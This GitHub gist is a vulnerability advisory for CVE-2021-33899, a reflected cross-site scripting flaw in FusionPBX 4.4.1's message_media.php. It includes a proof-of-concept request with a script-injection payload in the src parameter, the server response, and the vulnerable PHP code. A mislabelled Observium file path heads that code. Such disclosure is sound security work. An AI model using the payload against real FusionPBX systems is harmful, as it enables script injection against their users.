Last active
June 8, 2021 06:10
-
-
Save ahpaleus/5ceb6c56b5aeb3b6be62e08b0e7ab52f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2021-33899 | |
------------------------------------------ | |
Cross-Site Scripting in message_media.php | |
------------------------------------------ | |
[Description] | |
Penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it. | |
------------------------------------------ | |
[Additional Information] | |
Example request that allows to trigger XSS payload. | |
GET /app/messages/message_media.php?id=3e610080-ddb9-4e89-928a-ed681bb2ca58&action=display&src=testtest../%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 | |
Host: localhost:8443 | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 | |
Accept: */* | |
Referer: https://localhost:8443/test | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | |
Connection: close | |
Response: | |
HTTP/1.1 200 OK | |
Server: nginx | |
Date: Thu, 27 May 2021 14:39:07 GMT | |
Content-Type: text/html; charset=UTF-8 | |
Connection: close | |
Set-Cookie: PHPSESSID=b613mqroo0pn7c9eaei5utpabc; path=/ | |
Expires: Thu, 19 Nov 1981 08:52:00 GMT | |
Cache-Control: no-store, no-cache, must-revalidate | |
Pragma: no-cache | |
Content-Length: 582 | |
<table cellpadding='0' cellspacing='0' border='0' width='100%' height='100%'> | |
<tr> | |
<td align='center' valign='middle'> | |
<img src="data:application/octet-stream;base64," style='width: auto; max-width: 95%; height: auto; max-height: 800px; box-shadow: 0px 1px 20px #888; cursor: pointer;' onclick="$('#message_media_layer').fadeOut(200);" oncontextmenu="window.open('message_media.php?id=3e610080-ddb9-4e89-928a-ed681bb2ca58&src=testtest../>"><script>alert(1)</script>&action=download'); return false;" title="Click to Close, Right-Click to Save"> | |
</td> | |
</tr> | |
</table> | |
Below we present vulnerable code: | |
https://github.com/fusionpbx/fusionpbx/blob/master/app/messages/message_media.php#L90 | |
/var/opt/observium/html/pages/iftype.inc.php: | |
<?php | |
(...) | |
//includes | |
require_once "root.php"; | |
require_once "resources/require.php"; | |
//add multi-lingual support | |
$language = new text; | |
$text = $language->get(); | |
//get media uuid | |
$message_media_uuid = $_GET['id']; | |
$message_media_source = $_GET['src']; | |
$action = $_GET['action']; | |
//get media | |
if (is_uuid($message_media_uuid)) { | |
$sql = "select message_media_type, message_media_url, message_media_content "; | |
$sql .= "from v_message_media "; | |
$sql .= "where message_media_uuid = :message_media_uuid "; | |
if (is_uuid($_SESSION['user_uuid'])) { | |
$sql .= "and user_uuid = :user_uuid "; | |
$parameters['user_uuid'] = $_SESSION['user_uuid']; | |
} | |
$sql .= "and (domain_uuid = :domain_uuid or domain_uuid is null) "; | |
$parameters['message_media_uuid'] = $message_media_uuid; | |
$parameters['domain_uuid'] = $domain_uuid; | |
$database = new database; | |
$media = $database->select($sql, $parameters, 'row'); | |
unset($sql, $parameters); | |
switch (strtolower($media['message_media_type'])) { | |
case 'jpg': | |
case 'jpeg': $content_type = 'image/jpg'; break; | |
case 'png': $content_type = 'image/png'; break; | |
case 'gif': $content_type = 'image/gif'; break; | |
case 'aac': $content_type = 'audio/aac'; break; | |
case 'wav': $content_type = 'audio/wav'; break; | |
case 'mp3': $content_type = 'audio/mpeg'; break; | |
case 'mp2': $content_type = 'video/mpeg'; break; | |
case 'm4v': $content_type = 'video/mp4'; break; | |
case 'pdf': $content_type = 'application/pdf'; break; | |
case 'doc': $content_type = 'application/vnd.ms-word'; break; | |
case 'docx': $content_type = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'; break; | |
case 'xls': $content_type = 'application/vnd.ms-excel'; break; | |
case 'xlsx': $content_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'; break; | |
case 'ppt': $content_type = 'application/vnd.ms-powerpoint'; break; | |
case 'pptx': $content_type = 'application/vnd.openxmlformats-officedocument.presentationml.presentation'; break; | |
case 'zip': $content_tyep = 'application/zip'; break; | |
default: $content_type = 'application/octet-stream'; break; | |
} | |
switch ($action) { | |
case 'download': | |
header("Content-type: ".$content_type."; charset=utf-8"); | |
$filename = $message_media_source != '' ? $message_media_source."_".$message_media_uuid.".".strtolower($media['message_media_type']) : $media['message_media_url']; | |
header("Content-Disposition: attachment; filename=\"".$filename."\""); | |
header("Content-Length: ".strlen(base64_decode($media['message_media_content']))); | |
echo base64_decode($media['message_media_content']); | |
break; | |
case 'display': | |
echo " <table cellpadding='0' cellspacing='0' border='0' width='100%' height='100%'>\n"; | |
echo " <tr>\n"; | |
echo " <td align='center' valign='middle'>\n"; | |
echo " <img src=\"data:".$content_type.";base64,".$media['message_media_content']."\" style='width: auto; max-width: 95%; height: auto; max-height: 800px; box-shadow: 0px 1px 20px #888; cursor: pointer;' onclick=\"$('#message_media_layer').fadeOut(200);\" oncontextmenu=\"window.open('message_media.php?id=".$message_media_uuid."&src=".$message_media_source."&action=download'); return false;\" title=\"Click to Close, Right-Click to Save\">\n"; | |
echo " </td>\n"; | |
echo " </tr>\n"; | |
echo " </table>\n"; | |
break; | |
} | |
} | |
?> | |
The unsanitized value of the message_media_source variable is printed, originally coming from the src parameter value. | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Cross Site Scripting | |
------------------------------------------ | |
[Vendor of Product] | |
https://www.fusionpbx.com/ | |
------------------------------------------ | |
[Affected Product Code Base] | |
FusionPBX - 4.4.1 | |
------------------------------------------ | |
[Affected Component] | |
app/messages/message_media.php | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[Reference] | |
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md | |
https://www.owasp.org/images/b/bc/OWASP_Top_10_Proactive_Controls_V3.pdf | |
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001) | |
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002) | |
https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001) | |
------------------------------------------ | |
[Discoverer] | |
Maciej Domański (AFINE.com team) | |
------------------------------------------ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment